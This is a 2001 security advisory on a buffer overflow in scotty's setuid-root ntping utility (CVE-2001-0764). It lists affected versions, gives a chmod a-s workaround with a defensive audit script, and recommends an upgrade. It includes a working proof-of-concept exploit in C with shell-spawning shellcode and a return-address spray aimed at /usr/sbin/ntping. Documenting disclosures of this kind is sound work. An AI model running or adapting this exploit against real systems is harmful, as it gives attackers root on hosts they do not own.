Juergen Schoenwaelder scotty ntping buffer overflow vulnerability
Published: 2001-06-21
Updated: 2001-07-03
Affected systems:
Juergen Schoenwaelder Scotty 2.1.9
Juergen Schoenwaelder Scotty 2.1.8
Juergen Schoenwaelder Scotty 2.1.7
Juergen Schoenwaelder Scotty 2.1.10
Unaffected systems:
Juergen Schoenwaelder Scotty 2.1.11
Description:
BUGTRAQ ID: 2911
CVE(CAN) ID: CVE-2001-0764
ntping is a component shipped with scotty that is used to check the status and configuration of TCP/IP networks. It is installed with the setuid root bit set.
It contains a buffer overflow: a local attacker can pass an overly long string as a command-line argument, and an argument longer than 9000 bytes triggers the overflow.
A local attacker can exploit this vulnerability to execute arbitrary code as root.
<*Source: KF (dotslash@snosoft.com) *>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
Larry W. Cashdollar (lwc@Vapid.dhs.org) provided the following test code:
/* Larry W. Cashdollar 6/13/2001
   http://vapid.dhs.org Vapid Labs
   Overflows ntping for scotty-2.1.9 based on post by
   dotslash@snosoft.com */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy (missing in the original posting) */
#include <unistd.h>   /* execl (missing in the original posting) */
#define NOP 0x90 /* no operation, skip to next instruction. */
#define LEN 590  /* our buffer size. */
/* lacks a call to setuid(0) */
char shellcode[] = /* Aleph1's shell code. */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Nab the stack pointer to use as an index into our nop's */
long
get_sp ()
{
    __asm__ ("mov %esp, %eax");
}
int
main (int argc, char *argv[])
{
    char buffer[LEN];
    int i;
    long retaddr = get_sp ();
    /* Fill the buffer with our new address to jump to esp + offset */
    for (i = 0; i < LEN; i += 4)
        *(long *) &buffer[i] = retaddr + atoi (argv[1]);
    /* copy the NOPs in to the buffer leaving space for shellcode and
       pointers */
    printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]), LEN);
    /*
    for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
        *(buffer + i) = NOP;*/
    /* copy the shell code into the buffer */
    memcpy (buffer + i, shellcode, strlen (shellcode));
    execl ("/usr/sbin/ntping", "ntping", buffer, 0, 0);
}
Recommendation:
Interim workaround:
Temporarily remove the setuid root bit from ntping:
#chmod a-s ntping
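The following shell script is an added example, not part of the advisory and not scotty's own code. It automates the workaround above from a defender's side: it looks for any ntping binary that still carries the setuid bit under a set of assumed install prefixes (the advisory itself only names /usr/sbin/ntping), reports it, and provides a function that strips the bit with the same chmod a-s and verifies the bit is really gone. Run as root to strip; run unprivileged to audit only.

```shell
#!/bin/sh
# Constructed example (not from the advisory or from scotty): audit a host for a
# setuid ntping and, on demand, apply the advisory's chmod a-s workaround.

# Install prefixes to check. These are assumptions; the advisory names only
# /usr/sbin/ntping. Adjust to the prefix scotty was installed under.
NTPING_DIRS="/usr/sbin /usr/local/sbin /usr/local/bin /usr/bin"

# is_setuid PATH: returns 0 if PATH exists and its mode has the setuid bit,
# 1 otherwise (a missing file is reported as not setuid).
is_setuid() {
    [ -u "$1" ]
}

# find_setuid_ntping DIR...: print every regular file named ntping beneath the
# given directories whose mode includes setuid (find's -perm -4000), one per
# line. Directories that do not exist are skipped silently.
find_setuid_ntping() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type f -name ntping -perm -4000 2>/dev/null
    done
}

# count_setuid_ntping DIR...: number of setuid ntping binaries found.
count_setuid_ntping() {
    find_setuid_ntping "$@" | wc -l | tr -d ' '
}

# strip_setuid PATH: apply the advisory's workaround (chmod a-s) and confirm it
# took effect. Returns 0 only if the setuid bit is gone afterwards, so a failed
# chmod (e.g. not root, read-only filesystem) is reported rather than assumed.
strip_setuid() {
    chmod a-s "$1" && ! is_setuid "$1"
}

# Read-only audit of the default locations; nothing is modified here.
found=$(find_setuid_ntping $NTPING_DIRS)
if [ -n "$found" ]; then
    echo "setuid ntping found (run strip_setuid <path> as root to apply the workaround):"
    echo "$found"
else
    echo "no setuid ntping found under: $NTPING_DIRS"
fi
```

The audit part is safe to run from cron or a configuration-management check; only strip_setuid changes anything, and it reports failure instead of silently assuming the bit was cleared. Once the upgrade to 2.1.11 or later is in place the check should report nothing, which also makes it a useful regression test that the workaround was not undone by a package reinstall.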
Vendor patch:
Upgrade to Scotty 2.1.11 or later:
http://janus.cs.utwente.nl/~schoenw/scotty/